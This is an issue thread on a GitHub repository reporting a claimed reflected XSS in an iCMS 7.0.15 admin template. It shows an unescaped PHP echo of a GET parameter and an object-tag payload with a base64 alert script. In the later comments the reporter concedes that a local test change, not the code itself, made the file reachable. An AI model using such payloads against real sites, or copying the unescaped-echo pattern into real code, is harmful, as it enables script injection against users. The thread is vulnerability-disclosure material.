### ISSUE TITLE
iCMS-7.0.15 Reflected XSS

### ISSUE THREAD

**Issue by ChireC** [idreamsoft/iCMS#78]
In `iCMS-7.0.15/app/admincp/template/admincp.access.php` Line 32
```
<input type="text" name="keywords" class="span2" id="keywords" value="<?php echo $_GET['keywords'] ; ?>" />
```
Payload:
```
iCMS-7.0.15/app/admincp/template/admincp.access.php?keywords=\"><object+data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==></object>
```
Result:
![Reflected_XSS](https://user-images.githubusercontent.com/8305597/64415263-86ca8780-d0c7-11e9-87c7-33c9d95459c8.png)

**Comment by mntn0x** [comment]
请问你是怎么绕过最开头的
`defined('iPHP') OR exit('What are you doing?');`的？

**Comment by idreamsoft** [comment]
怎么办到的?

**Comment by ChireC** [comment]
不用绕啊

**Comment by idreamsoft** [comment]
不用绕 怎么访问.这文件是不能直接访问的

**Comment by ChireC** [comment]
好吧，我好像前面为了方便测试改了什么东西，后面忘记改回来了 不好意思

**Comment by idreamsoft** [comment]
没事没事 辛苦了
